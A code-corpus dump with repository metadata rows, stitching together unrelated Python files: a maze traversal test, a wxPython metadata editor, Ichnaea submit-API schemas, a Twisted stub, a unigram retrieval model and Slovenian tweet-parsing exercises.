print("Random Future Exit Move: \t\t", random_exit_full)
print("\nTotal # of Previous Moves: \t", len(traversalPath))
print("List of All Previous Moves: \n\t", traversalPath)
print("\nDictionary of Previously Visited Rooms:")
print_nested(graph)
print("\n------------------------------------------------------")
print("----------------------------------------------------------------\n\n")
print("*************** DID THE TESTS PASS? ****************\n")
# TRAVERSAL TEST
# Replay traversalPath from the starting room and check that every room in
# the map was visited.
visited_rooms = set()
player.currentRoom = world.startingRoom
visited_rooms.add(player.currentRoom)
for move in traversalPath:
    player.travel(move)
    visited_rooms.add(player.currentRoom)
if len(visited_rooms) == len(roomGraph):
    print("YES!\n \nALL TESTS for 'traversalPath' PASSED: ")
    print("---TOTAL moves: ", len(traversalPath))
    print("---TOTAL rooms visited: ", len(visited_rooms))
    print("Visited Rooms: ", visited_rooms)
else:
    print("NOPE! INCOMPLETE TRAVERSAL!\n \nTESTS for 'traversalPath' FAILED:")
    print(f"---TOTAL # of Unvisited Rooms:\t\t{len(roomGraph) - len(visited_rooms)}")
    print("---Visited Rooms: \n", visited_rooms)
print("\n****************************************************\n")
#######
# UNCOMMENT TO WALK AROUND
#######
# player.currentRoom.printRoomDescription(player)
# while True:
#     cmds = input("-> ").lower().split(" ")
#     if cmds[0] in ["n", "s", "e", "w"]:
#         player.travel(cmds[0], True)
#     else:
#         print("I did not understand that command.")
"ticotheps@gmail.com"
] | ticotheps@gmail.com |
b095a13c61d3f6d4f6323acdbd1670fda772230d | c39f999cae8825afe2cdf1518d93ba31bd4c0e95 | /PYME/Analysis/MetadataTree.py | f1e6c667de7c1ded19123a87ef1ea3dcca949267 | [] | no_license | WilliamRo/CLipPYME | 0b69860136a9b2533f2f29fc29408d7471cb934d | 6596167034c727ad7dad0a741dd59e0e48f6852a | refs/heads/master | 2023-05-11T09:50:58.605989 | 2023-05-09T02:17:47 | 2023-05-09T02:17:47 | 60,789,741 | 3 | 1 | null | 2016-06-17T08:52:44 | 2016-06-09T16:30:14 | Python | UTF-8 | Python | false | false | 16,153 | py | #!/usr/bin/python
##################
# MetadataTree.py
#
# Copyright David Baddeley, 2009
# d.baddeley@auckland.ac.nz
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##################
import wx
import wx.gizmos as gizmos
from PYME.Acquire.MetaDataHandler import NestedClassMDHandler
#----------------------------------------------------------------------------
#----------------------------------------------------------------------------
from bisect import bisect
class TextEditMixin:
"""
A mixin class that enables any text in any column of a
multi-column listctrl to be edited by clicking on the given row
and column. You close the text editor by hitting the ENTER key or
clicking somewhere else on the listctrl. You switch to the next
column by hiting TAB.
To use the mixin you have to include it in the class definition
and call the __init__ function::
class TestListCtrl(wx.ListCtrl, TextEditMixin):
def __init__(self, parent, ID, pos=wx.DefaultPosition,
size=wx.DefaultSize, style=0):
wx.ListCtrl.__init__(self, parent, ID, pos, size, style)
TextEditMixin.__init__(self)
Authors: Steve Zatz, Pim Van Heuven (pim@think-wize.com)
"""
editorBgColour = wx.Colour(255,255,175) # Yellow
editorFgColour = wx.Colour(0,0,0) # black
    def __init__(self):
        """Create the shared cell editor and wire up mouse/selection handlers."""
        #editor = wx.TextCtrl(self, -1, pos=(-1,-1), size=(-1,-1),
        #                     style=wx.TE_PROCESS_ENTER|wx.TE_PROCESS_TAB \
        #                     |wx.TE_RICH2)
        self.make_editor()
        self.Bind(wx.EVT_TEXT_ENTER, self.CloseEditor)
        # NB: both right-click and double-click are routed to OnLeftDown.
        self.GetMainWindow().Bind(wx.EVT_RIGHT_DOWN, self.OnLeftDown)
        self.GetMainWindow().Bind(wx.EVT_LEFT_DCLICK, self.OnLeftDown)
        self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnItemSelected)
        # Column indices that may be edited in place; see makeColumnEditable().
        self.editableColumns = []
    def makeColumnEditable(self, col):
        """Allow in-place editing of column index *col*."""
        self.editableColumns.append(col)
def make_editor(self, col_style=wx.LIST_FORMAT_LEFT):
style =wx.TE_PROCESS_ENTER|wx.TE_PROCESS_TAB|wx.TE_RICH2
style |= {wx.LIST_FORMAT_LEFT: wx.TE_LEFT,
wx.LIST_FORMAT_RIGHT: wx.TE_RIGHT,
wx.LIST_FORMAT_CENTRE : wx.TE_CENTRE
}[col_style]
editor = wx.TextCtrl(self, -1, style=style)
editor.SetBackgroundColour(self.editorBgColour)
editor.SetForegroundColour(self.editorFgColour)
font = self.GetFont()
editor.SetFont(font)
self.curRow = 0
self.curCol = 0
editor.Hide()
if hasattr(self, 'editor'):
self.editor.Destroy()
self.editor = editor
self.col_style = col_style
self.editor.Bind(wx.EVT_CHAR, self.OnChar)
self.editor.Bind(wx.EVT_KILL_FOCUS, self.CloseEditor)
    def OnItemSelected(self, evt):
        # Track the currently selected row so the editor opens on it.
        self.curRow = evt.GetIndex()
        evt.Skip()
def OnChar(self, event):
''' Catch the TAB, Shift-TAB, cursor DOWN/UP key code
so we can open the editor at the next column (if any).'''
keycode = event.GetKeyCode()
if keycode == wx.WXK_TAB and event.ShiftDown():
self.CloseEditor()
if self.curCol-1 >= 0:
self.OpenEditor(self.curCol-1, self.curRow)
elif keycode == wx.WXK_TAB:
self.CloseEditor()
if self.curCol+1 < self.GetColumnCount():
self.OpenEditor(self.curCol+1, self.curRow)
elif keycode == wx.WXK_ESCAPE:
self.CloseEditor()
elif keycode == wx.WXK_DOWN:
self.CloseEditor()
if self.curRow+1 < self.GetItemCount():
self._SelectIndex(self.curRow+1)
self.OpenEditor(self.curCol, self.curRow)
elif keycode == wx.WXK_UP:
self.CloseEditor()
if self.curRow > 0:
self._SelectIndex(self.curRow-1)
self.OpenEditor(self.curCol, self.curRow)
else:
event.Skip()
def OnLeftDown(self, evt=None):
''' Examine the click and double
click events to see if a row has been click on twice. If so,
determine the current row and columnn and open the editor.'''
if self.editor.IsShown():
self.CloseEditor()
x,y = evt.GetPosition()
#print x,y
item, flags, col = self.HitTest((x,y))
print((item, flags, col))
# if row != self.curRow: # self.curRow keeps track of the current row
# evt.Skip()
# return
# the following should really be done in the mixin's init but
# the wx.ListCtrl demo creates the columns after creating the
# ListCtrl (generally not a good idea) on the other hand,
# doing this here handles adjustable column widths
# self.col_locs = [0]
# loc = 0
# for n in range(self.GetColumnCount()):
# loc = loc + self.GetColumnWidth(n)
# self.col_locs.append(loc)
#
#
# col = bisect(self.col_locs, x+self.GetScrollPos(wx.HORIZONTAL)) - 1
#row = item
if col in self.editableColumns:
self.OpenEditor(col, item)
def OpenEditor(self, col, row):
''' Opens an editor at the current position. '''
# give the derived class a chance to Allow/Veto this edit.
evt = wx.ListEvent(wx.wxEVT_COMMAND_LIST_BEGIN_LABEL_EDIT, self.GetId())
evt.m_itemIndex = row
evt.m_col = col
item = self.GetItem(row, col)
evt.m_item.SetId(item.GetId())
evt.m_item.SetColumn(item.GetColumn())
evt.m_item.SetData(item.GetData())
evt.m_item.SetText(item.GetText())
ret = self.GetEventHandler().ProcessEvent(evt)
if ret and not evt.IsAllowed():
return # user code doesn't allow the edit.
if self.GetColumn(col).m_format != self.col_style:
self.make_editor(self.GetColumn(col).m_format)
x0 = self.col_locs[col]
x1 = self.col_locs[col+1] - x0
scrolloffset = self.GetScrollPos(wx.HORIZONTAL)
# scroll forward
if x0+x1-scrolloffset > self.GetSize()[0]:
if wx.Platform == "__WXMSW__":
# don't start scrolling unless we really need to
offset = x0+x1-self.GetSize()[0]-scrolloffset
# scroll a bit more than what is minimum required
# so we don't have to scroll everytime the user presses TAB
# which is very tireing to the eye
addoffset = self.GetSize()[0]/4
# but be careful at the end of the list
if addoffset + scrolloffset < self.GetSize()[0]:
offset += addoffset
self.ScrollList(offset, 0)
scrolloffset = self.GetScrollPos(wx.HORIZONTAL)
else:
# Since we can not programmatically scroll the ListCtrl
# close the editor so the user can scroll and open the editor
# again
self.editor.SetValue(self.GetItem(row, col).GetText())
self.curRow = row
self.curCol = col
self.CloseEditor()
return
y0 = self.GetItemRect(row)[1]
editor = self.editor
editor.SetDimensions(x0-scrolloffset,y0, x1,-1)
editor.SetValue(self.GetItem(row, col).GetText())
editor.Show()
editor.Raise()
editor.SetSelection(-1,-1)
editor.SetFocus()
self.curRow = row
self.curCol = col
# FIXME: this function is usually called twice - second time because
# it is binded to wx.EVT_KILL_FOCUS. Can it be avoided? (MW)
def CloseEditor(self, evt=None):
''' Close the editor and save the new value to the ListCtrl. '''
if not self.editor.IsShown():
return
text = self.editor.GetValue()
self.editor.Hide()
self.SetFocus()
# post wxEVT_COMMAND_LIST_END_LABEL_EDIT
# Event can be vetoed. It doesn't has SetEditCanceled(), what would
# require passing extra argument to CloseEditor()
evt = wx.ListEvent(wx.EVT_LIST_END_LABEL_EDIT.evtType[0], self.GetId())
evt.m_itemIndex = self.curRow
evt.m_col = self.curCol
item = self.GetItem(self.curRow, self.curCol)
evt.m_item.SetId(item.GetId())
evt.m_item.SetColumn(item.GetColumn())
evt.m_item.SetData(item.GetData())
evt.m_item.SetText(text) #should be empty string if editor was canceled
ret = self.GetEventHandler().ProcessEvent(evt)
if not ret or evt.IsAllowed():
if self.IsVirtual():
# replace by whather you use to populate the virtual ListCtrl
# data source
self.SetVirtualData(self.curRow, self.curCol, text)
else:
self.SetStringItem(self.curRow, self.curCol, text)
self.RefreshItem(self.curRow)
    def _SelectIndex(self, row):
        """Move the list selection from the current row to *row*, clamping
        *row* to the last item and scrolling it into view.
        """
        listlen = self.GetItemCount()
        # NOTE(review): this only bails out when row < 0 AND the list is
        # empty ('and' binds both conditions); a negative row with a
        # non-empty list falls through - confirm that is intended.
        if row < 0 and not listlen:
            return
        if row > (listlen-1):
            row = listlen -1
        # Deselect the old row, then select and reveal the new one.
        self.SetItemState(self.curRow, ~wx.LIST_STATE_SELECTED,
                          wx.LIST_STATE_SELECTED)
        self.EnsureVisible(row)
        self.SetItemState(row, wx.LIST_STATE_SELECTED,
                          wx.LIST_STATE_SELECTED)
#----------------------------------------------------------------------------
#----------------------------------------------------------------------------
class EditableTreeList(gizmos.TreeListCtrl, TextEditMixin):
    """A TreeListCtrl whose cells can be edited in place via TextEditMixin."""

    def __init__(self, parent, id=-1, style=wx.TR_DEFAULT_STYLE):
        # (removed a stray debug ``print(style)`` left over from development)
        gizmos.TreeListCtrl.__init__(self, parent, id, style=style)
        TextEditMixin.__init__(self)
class MetadataPanel(wx.Panel):
def __init__(self, parent, mdh, editable=True, refreshable=True):
self.mdh=mdh
wx.Panel.__init__(self, parent, -1)
#self.Bind(wx.EVT_SIZE, self.OnSize)
sizer1 = wx.BoxSizer(wx.VERTICAL)
self.tree = gizmos.TreeListCtrl(self, -1, style =
wx.TR_DEFAULT_STYLE
#| wx.TR_HAS_BUTTONS
#| wx.TR_TWIST_BUTTONS
#| wx.TR_ROW_LINES
#| wx.TR_EDIT_LABELS
| wx.TR_COLUMN_LINES
#| wx.TR_NO_LINES
| wx.TR_FULL_ROW_HIGHLIGHT
)
# create some columns
self.tree.AddColumn("Entry")
self.tree.AddColumn("Value")
self.tree.SetMainColumn(0) # the one with the tree in it...
self.tree.SetColumnWidth(0, 300)
self.tree.SetColumnWidth(1, 300)
self.root = self.tree.AddRoot("Metadata")
self.tree.SetItemText(self.root, "root", 0)
self.paths = {}
nmdh = NestedClassMDHandler(mdh)
self.addEntries(nmdh, self.root)
if editable:
self.editableCols = [1]
else:
self.editableCols = []
#entryNames = self.mdh.getEntryNames()
# for k in nmdh.__dict__.keys():
# #txt = "Item %d" % x
# child = self.tree.AppendItem(self.root, k)
# self.tree.SetItemText(child, txt + "(c1)", 1)
self.tree.ExpandAll(self.root)
self.tree.GetMainWindow().Bind(wx.EVT_RIGHT_DOWN, self.OnRightDown)
self.tree.GetMainWindow().Bind(wx.EVT_RIGHT_UP, self.OnRightUp)
self.tree.Bind(wx.EVT_TREE_END_LABEL_EDIT, self.OnEndEdit)
self.tree.Bind(wx.EVT_TREE_BEGIN_LABEL_EDIT, self.OnBeginEdit)
#self.tree.Bind(wx.EVT_TREE_ITEM_ACTIVATED, self.OnActivate)
sizer1.Add(self.tree, 1, wx.EXPAND, 0)
if refreshable == True:
bRefresh = wx.Button(self, -1, 'Refresh')
bRefresh.Bind(wx.EVT_BUTTON, self.rebuild)
sizer1.Add(bRefresh, 0, wx.ALL|wx.ALIGN_RIGHT, 5)
self.SetSizerAndFit(sizer1)
    def addEntries(self, mdh, node, entrypath=''):
        """Recursively populate the tree under *node* from a
        NestedClassMDHandler, recording each leaf's dotted path in
        self.paths (paths carry a leading '.', e.g. '.Camera.Name').
        """
        #en = []
        for k in mdh.__dict__.keys():
            child = self.tree.AppendItem(node, k)
            self.tree.SetItemText(child, k, 0)
            if mdh.__dict__[k].__class__ == NestedClassMDHandler:
                # Nested section: recurse with the extended dotted path.
                self.addEntries(mdh.__dict__[k], child, '.'.join((entrypath, k)))
            else:
                # Leaf entry: show its value in the second column.
                self.tree.SetItemText(child, str(mdh.getEntry(k)), 1)
                self.paths[child] = '.'.join((entrypath, k))
    def rebuild(self, event=None):
        """Rebuild the whole tree from self.mdh (used by the Refresh button)."""
        self.tree.DeleteRoot()
        self.root = self.tree.AddRoot("Metadata")
        self.tree.SetItemText(self.root, "root", 0)
        nmdh = NestedClassMDHandler(self.mdh)
        # NOTE(review): self.paths is not cleared here, so item handles from
        # the deleted tree accumulate across rebuilds - confirm/clean up.
        self.addEntries(nmdh, self.root)
        self.tree.ExpandAll(self.root)
#def OnActivate(self, evt):
#self.log.write('OnActivate: %s' % self.tree.GetItemText(evt.GetItem()))
# def OnRightDown(self, evt):
# pos = evt.GetPosition()
# item, flags, col = self.tree.HitTest(pos)
# if item:
# self.log.write('Flags: %s, Col:%s, Text: %s' %
# (flags, col, self.tree.GetItemText(item, col)))
def OnRightDown(self, event):
pt = event.GetPosition();
item, flags, col = self.tree.HitTest(pt)
if item:
# self.log.WriteText("OnRightClick: %s, %s, %s\n" %
# (self.tree.GetItemText(item), type(item), item.__class__))
self.tree.SelectItem(item)
def OnRightUp(self, event):
pt = event.GetPosition();
item, flags, col = self.tree.HitTest(pt)
#print item, flags, col
if item and col in self.editableCols:
#self.log.WriteText("OnRightUp: %s (manually starting label edit)\n"
# % self.tree.GetItemText(item))
self.tree.EditLabel(item, col)
    def OnBeginEdit(self, event):
        """Veto edits on anything that is not an actual metadata entry
        (e.g. section nodes or the root).
        """
        item = event.GetItem()
        entryName = self.GetItemFullname(item)
        if not entryName in self.mdh.getEntryNames():
            event.Veto()
def OnEndEdit(self, event):
# self.log.WriteText("OnEndEdit: %s %s\n" %
# (event.IsEditCancelled(), event.GetLabel()) )
# show how to reject edit, we'll not allow any digits
if not event.IsEditCancelled():
item = event.GetItem()
newLabel = event.GetLabel()
entryName = self.GetItemFullname(item)
if entryName in self.mdh.getEntryNames():
try:
ne = self.mdh.getEntry(entryName).__class__(newLabel)
#print ne
self.mdh.setEntry(entryName, ne)
except:
event.Veto()
#print event.GetLabel()
def GetItemFullname(self, item):
cp = item
parents = []
while not cp == self.root:
parents.append(cp)
cp = self.tree.GetItemParent(cp)
names = [self.tree.GetItemText(p) for p in parents]
return '.'.join(names[::-1])
def OnSize(self, evt):
self.tree.SetSize(self.GetSize())
| [
"willi4m@zju.edu.cn"
] | willi4m@zju.edu.cn |
9d296c259a2e461bf5c93b18863d06131d8b435c | 9e2d79a2cf1dbeaffe8ef897bb53f94af8b5b68c | /ichnaea/api/submit/schema_v0.py | 369e4e1815bfa4d4f1b610b8b794b4d3dfea8f60 | [
"Apache-2.0"
] | permissive | amolk4games/ichnaea | a7d1cbd12b6aa5c0d877fca380080b08fcff24b8 | 907c542da05b428c8e994bce1537390e22b3ca58 | refs/heads/master | 2021-01-19T07:21:54.851167 | 2016-04-08T15:20:37 | 2016-04-08T15:21:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,408 | py | """
Colander schemata describing the public v1/submit HTTP API.
"""
import colander
from ichnaea.api.schema import (
OptionalBoundedFloatNode,
OptionalIntNode,
OptionalMappingSchema,
OptionalNode,
OptionalSequenceSchema,
OptionalStringNode,
UnixTimeFromString,
)
class BlueV0Schema(OptionalMappingSchema):
    # One Bluetooth beacon observation; to_name maps the public v1 key
    # onto the internal name.
    key = OptionalStringNode(to_name='macAddress')

    age = OptionalIntNode()
    name = OptionalStringNode()
    signal = OptionalIntNode(to_name='signalStrength')

    def deserialize(self, data):
        """Drop Bluetooth entries that have no MAC address."""
        data = super(BlueV0Schema, self).deserialize(data)
        if 'macAddress' not in data:
            return colander.drop
        return data
class CellV0Schema(OptionalMappingSchema):
    # One cell tower observation; to_name maps the short v1 keys onto the
    # longer internal names.
    radio = OptionalStringNode(to_name='radioType')
    mcc = OptionalIntNode(to_name='mobileCountryCode')
    mnc = OptionalIntNode(to_name='mobileNetworkCode')
    lac = OptionalIntNode(to_name='locationAreaCode')
    cid = OptionalIntNode(to_name='cellId')

    age = OptionalIntNode()
    asu = OptionalIntNode()
    psc = OptionalIntNode(to_name='primaryScramblingCode')
    serving = OptionalIntNode()
    signal = OptionalIntNode(to_name='signalStrength')
    ta = OptionalIntNode(to_name='timingAdvance')
class WifiV0Schema(OptionalMappingSchema):
    # One WiFi access point observation.
    key = OptionalStringNode(to_name='macAddress')

    age = OptionalIntNode()
    channel = OptionalIntNode()
    frequency = OptionalIntNode()
    radio = OptionalStringNode(to_name='radioType')
    signal = OptionalIntNode(to_name='signalStrength')
    signalToNoiseRatio = OptionalIntNode()
    ssid = OptionalStringNode()

    def deserialize(self, data):
        """Drop WiFi entries that have no MAC address."""
        data = super(WifiV0Schema, self).deserialize(data)
        if 'macAddress' not in data:
            return colander.drop
        return data
class BaseReportV0Schema(OptionalMappingSchema):
    # Position / motion fields shared by all report flavours; to_name maps
    # the public v1 key onto the internal name.
    lat = OptionalBoundedFloatNode(to_name='latitude')
    lon = OptionalBoundedFloatNode(to_name='longitude')
    time = OptionalNode(UnixTimeFromString(), to_name='timestamp')

    accuracy = OptionalBoundedFloatNode()
    age = OptionalIntNode()
    altitude = OptionalBoundedFloatNode()
    altitude_accuracy = OptionalBoundedFloatNode(
        to_name='altitudeAccuracy')
    heading = OptionalBoundedFloatNode()
    pressure = OptionalBoundedFloatNode()
    radio = OptionalStringNode(to_name='radioType')
    speed = OptionalBoundedFloatNode()
    source = OptionalStringNode()
class ReportV0Schema(BaseReportV0Schema):
    """One v1 submit report: position fields plus per-radio observations."""

    # Top-level keys that get folded into the nested 'position' mapping.
    _position_fields = (
        'latitude',
        'longitude',
        'accuracy',
        'altitude',
        'altitudeAccuracy',
        'age',
        'heading',
        'pressure',
        'speed',
        'source',
    )

    @colander.instantiate(to_name='bluetoothBeacons', missing=())
    class blue(OptionalSequenceSchema):  # NOQA
        sequence_item = BlueV0Schema()

    @colander.instantiate(to_name='cellTowers', missing=())
    class cell(OptionalSequenceSchema):  # NOQA
        sequence_item = CellV0Schema()

    @colander.instantiate(to_name='wifiAccessPoints', missing=())
    class wifi(OptionalSequenceSchema):  # NOQA
        sequence_item = WifiV0Schema()

    def deserialize(self, data):
        """Normalize a raw report: drop empty reports, fill in each cell's
        radio type from the report-level one, and group the position fields
        under a single 'position' mapping.
        """
        data = super(ReportV0Schema, self).deserialize(data)
        if (data is colander.drop or
                data is colander.null):  # pragma: no cover
            return colander.drop

        # A report without any observations is useless.
        if not (data.get('bluetoothBeacons') or data.get('cellTowers') or
                data.get('wifiAccessPoints')):
            return colander.drop

        top_radio = data.get('radioType', None)
        for cell in data.get('cellTowers', ()):
            # BUG FIX: the original condition was
            #   'radioType' not in cell or not cell['radioType'] and top_radio
            # which parses as A or (B and C), so a missing key was assigned
            # ``top_radio`` even when that was None. Parenthesized to match
            # the intent: only fill a missing/empty value when the
            # report-level radio is actually present.
            if ('radioType' not in cell or not cell['radioType']) and top_radio:
                cell['radioType'] = top_radio
            if cell.get('radioType') == 'umts':
                # 'umts' is the legacy name for WCDMA.
                cell['radioType'] = 'wcdma'

        if 'radioType' in data:
            del data['radioType']

        position_data = {}
        for field in self._position_fields:
            if field in data:
                position_data[field] = data[field]
                del data[field]
        if position_data:
            data['position'] = position_data

        return data
class SubmitV0Schema(OptionalMappingSchema):
    # Top-level v1 submit payload: {'items': [report, ...]}.

    @colander.instantiate()
    class items(OptionalSequenceSchema):  # NOQA
        report = ReportV0Schema()


SUBMIT_V0_SCHEMA = SubmitV0Schema()
| [
"hanno@hannosch.eu"
] | hanno@hannosch.eu |
fe972e3f143c34206e2f70eec1e9dd21dc51fb48 | f85c41af07c89af418b7565d289e8237ebe433f1 | /stubs/twisted/web/server.pyi | 201fab94b71c99ae8d97155f18bb20ed7273cc8f | [
"Apache-2.0"
] | permissive | matrix-org/sydent | 3b58e9488ce594b4fc803f9114d9b137a500611c | 77cb99e3fc6a77c3bc2b66005770bd940060fae4 | refs/heads/main | 2023-08-04T09:52:33.984167 | 2023-07-31T10:53:38 | 2023-07-31T10:53:38 | 22,844,878 | 269 | 103 | Apache-2.0 | 2023-09-12T11:17:20 | 2014-08-11T15:52:07 | Python | UTF-8 | Python | false | false | 669 | pyi | from typing import Callable, Optional
from twisted.web import http
from twisted.web.resource import IResource
class Request(http.Request): ...
# A requestFactory is allowed to be "[a] factory which is called with (channel)
# and creates L{Request} instances.".
RequestFactory = Callable[[http.HTTPChannel], Request]
class Site(http.HTTPFactory):
    # Minimal stub of twisted.web.server.Site - only what this project uses.
    displayTracebacks: bool
    def __init__(
        self,
        resource: IResource,
        requestFactory: Optional[RequestFactory] = ...,
        # Args and kwargs get passed to http.HTTPFactory. But we don't use them.
        *args: object,
        **kwargs: object,
    ): ...
NOT_DONE_YET = object # Opaque
| [
"noreply@github.com"
] | matrix-org.noreply@github.com |
eafab3a40a8fcd6e8f3c5f79a7ab45fb09a1997d | e27333261b8e579564016c71d2061cc33972a8b8 | /development_codes/Backend/.history/UnigramLanguageModelImplementation_20210809204100.py | d1971d7e1650058901c9456feb9356fa2684514b | [] | no_license | Dustyik/NewsTweet_InformationRetrieval | 882e63dd20bc9101cbf48afa6c3302febf1989b1 | d9a6d92b51c288f5bcd21ea1cc54772910fa58f7 | refs/heads/master | 2023-07-01T09:12:53.215563 | 2021-08-12T08:28:33 | 2021-08-12T08:28:33 | 382,780,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,156 | py | import math
from IPython.display import display
import sys
from BM25implementation import QueryParsers
ALPHA = 0.75
NORMALIZE_PROBABILITY = True
class UnigramLanguageModel:
    """Unigram query-likelihood scorer over a DataFrame of tweets.

    ``tweets_data`` is expected to be a pandas DataFrame with a
    ``clean_text`` column of whitespace-separated, preprocessed tweet text.
    """

    def __init__(self, tweets_data):  # tweets_data is a pandas DataFrame
        self.tweets_data = tweets_data
        # Collection-wide word counts (only used by the currently disabled
        # interpolation term in calculate_interpolated_sentence_probability).
        self.wordsCollectionFrequencyDictionary = self.create_words_frequency_dict(tweets_data)

    def create_words_frequency_dict(self, tweets_data, collection=True):
        """Build a {word: count} mapping.

        With ``collection=True`` *tweets_data* is the tweets DataFrame and
        every ``clean_text`` entry is tokenised on single spaces; with
        ``collection=False`` *tweets_data* is already a list of tokens.
        """
        word_frequency_dictionary = {}
        if collection:
            for sentence in tweets_data.clean_text.tolist():
                for word in sentence.split(" "):
                    word_frequency_dictionary[word] = word_frequency_dictionary.get(word, 0) + 1
        else:
            for word in tweets_data:
                word_frequency_dictionary[word] = word_frequency_dictionary.get(word, 0) + 1
        return word_frequency_dictionary

    def calculate_total_no_of_words(self, wordsCollectionFrequencyDictionary):
        """Return the total token count (sum of all word frequencies)."""
        return sum(wordsCollectionFrequencyDictionary.values())

    def calculate_unigram_probability(self, word: str, wordCollectionFrequencyDictionary):
        """Return P(word | model); unseen words get a pseudo-count of 1
        (add-one style smoothing), so the result is never zero.
        """
        totalNumberOfWords = self.calculate_total_no_of_words(wordCollectionFrequencyDictionary)
        try:
            return wordCollectionFrequencyDictionary[word] / totalNumberOfWords
        except KeyError:
            return 1 / totalNumberOfWords  # add-one smoothing for unseen words

    def calculate_interpolated_sentence_probability(self, querySentenceList: list, document,
                                                    alpha=ALPHA, normalize_probability=NORMALIZE_PROBABILITY):
        """Score *document* (a whitespace-separated string) for the query terms.

        Returns the product of the per-term document probabilities scaled by
        *alpha* when ``normalize_probability`` is true, otherwise its log2.
        (Debug prints from the original were removed; the maths is unchanged.)

        NOTE(review): the collection-model term
        ``(1 - alpha) * P(word | collection)`` of Jelinek-Mercer style
        interpolation is disabled in the original (``+ 0``); this keeps that
        behaviour - confirm before re-enabling.
        """
        documentWordFrequencyDictionary = self.create_words_frequency_dict(
            list(document.split(" ")), collection=False)
        total_score = 1
        for word in querySentenceList:
            total_score *= alpha * self.calculate_unigram_probability(
                word, documentWordFrequencyDictionary) + 0
        if normalize_probability:
            return total_score
        return math.log(total_score) / math.log(2)

    def getQueryLikelihoodModelScore(self, querySentence: list):
        """Score every tweet against *querySentence*, sort the DataFrame by
        that score (in place, descending) and return it.
        """
        querySentenceList = QueryParsers(querySentence).query
        self.tweets_data["QueryLikelihoodModelScore"] = self.tweets_data.apply(
            lambda row: self.calculate_interpolated_sentence_probability(querySentenceList, row.clean_text),
            axis=1)
        self.tweets_data.sort_values(by='QueryLikelihoodModelScore', ascending=False, inplace=True)
        return self.tweets_data
| [
"chiayik_tan@mymail.sutd.edu.sg"
] | chiayik_tan@mymail.sutd.edu.sg |
def unikati(s):
    """Return the items of *s* with duplicates removed, keeping
    first-occurrence order.
    """
    brez_ponovitev = []
    for element in s:
        if element not in brez_ponovitev:
            brez_ponovitev.append(element)
    return brez_ponovitev
def avtor(tvit):
    """Return the tweet's author: everything before the first ':'."""
    ime, _, _ = tvit.partition(":")
    return ime
def vsi_avtorji(tviti):
    """Return the unique tweet authors in order of first appearance."""
    avtorji = []
    for tvit in tviti:
        kdo = tvit.split(":")[0]
        if kdo not in avtorji:
            avtorji.append(kdo)
    return avtorji
def izloci_besedo(beseda):
    """Strip *beseda* down to its alphanumeric characters and dashes."""
    ohranjeno = [znak for znak in beseda if znak.isalnum() or znak == "-"]
    return "".join(ohranjeno)
def se_zacne_z(tvit, c):
    """Return the cleaned-up words of *tvit* that begin with prefix *c*."""
    zadetki = []
    for beseda in tvit.split():
        if beseda.startswith(c):
            zadetki.append("".join(z for z in beseda if z.isalnum() or z == "-"))
    return zadetki
def zberi_se_zacne_z(tviti, c):
    """Return the unique cleaned-up words starting with *c* across all
    *tviti*, in first-seen order.
    """
    zbrano = []
    for tvit in tviti:
        for beseda in tvit.split():
            if beseda.startswith(c):
                cista = "".join(z for z in beseda if z.isalnum() or z == "-")
                if cista not in zbrano:
                    zbrano.append(cista)
    return zbrano
def vse_afne(tviti):
    """Return every @-mentioned name across *tviti* (with punctuation and
    the '@' stripped), deduplicated in first-occurrence order.
    """
    omenjeni = []
    for tvit in tviti:
        for beseda in tvit.split():
            if beseda.startswith("@"):
                ime = "".join(zn for zn in beseda if zn.isalnum() or zn == "-")
                if ime not in omenjeni:
                    omenjeni.append(ime)
    return omenjeni
def vsi_hashtagi(tviti):
    """Return every hashtag across *tviti* (with punctuation and the '#'
    stripped), deduplicated in first-occurrence order.
    """
    oznake = []
    for tvit in tviti:
        for beseda in tvit.split():
            if beseda.startswith("#"):
                oznaka = "".join(zn for zn in beseda if zn.isalnum() or zn == "-")
                if oznaka not in oznake:
                    oznake.append(oznaka)
    return oznake
def vse_osebe(tviti):
    """Return a sorted, duplicate-free list of all people: tweet authors
    plus everyone who is @-mentioned.
    """
    osebe = []
    for tvit in tviti:
        osebe.append(tvit.split(":")[0])
        for beseda in tvit.split():
            if beseda.startswith("@"):
                osebe.append("".join(zn for zn in beseda if zn.isalnum() or zn == "-"))
    urejeno = []
    for ime in sorted(osebe):
        if ime not in urejeno:
            urejeno.append(ime)
    return urejeno
def custva(tviti, hashtagi):
    """Return the sorted, duplicate-free authors of tweets that contain
    any of the strings in *hashtagi*.
    """
    avtorji = []
    for tvit in tviti:
        for oznaka in hashtagi:
            if oznaka in tvit:
                avtorji.append(tvit.split(":")[0])
    rezultat = []
    for kdo in sorted(avtorji):
        if kdo not in rezultat:
            rezultat.append(kdo)
    return rezultat
def se_poznata(tviti, oseba1, oseba2):
    """Return True if either person @-mentions the other in any tweet.

    Bug fixes vs. the original:
    - mentions are accumulated over ALL of an author's tweets (the original
      overwrote the dict entry per tweet, keeping only the last tweet's
      mentions);
    - a person who never tweeted no longer causes an early False via
      KeyError when the other person mentions them.
    """
    omembe = {}
    for tvit in tviti:
        kdo = tvit.split(":")[0]
        for beseda in tvit.split():
            if beseda.startswith("@"):
                ime = "".join(zn for zn in beseda if zn.isalnum() or zn == "-")
                omembe.setdefault(kdo, []).append(ime)
    return (oseba1 in omembe.get(oseba2, ()) or
            oseba2 in omembe.get(oseba1, ()))
| [
"lenart.motnikar@gmail.com"
] | lenart.motnikar@gmail.com |
a25e272a7d02407e4dcb9451996d404845773daf | 22bf910b64283b3c15cc4d80542e83fa89e9f09d | /monero_glue/messages/MoneroGetTxKeyRequest.py | b935838df9f412978aeb49278af672fb07c50028 | [
"MIT"
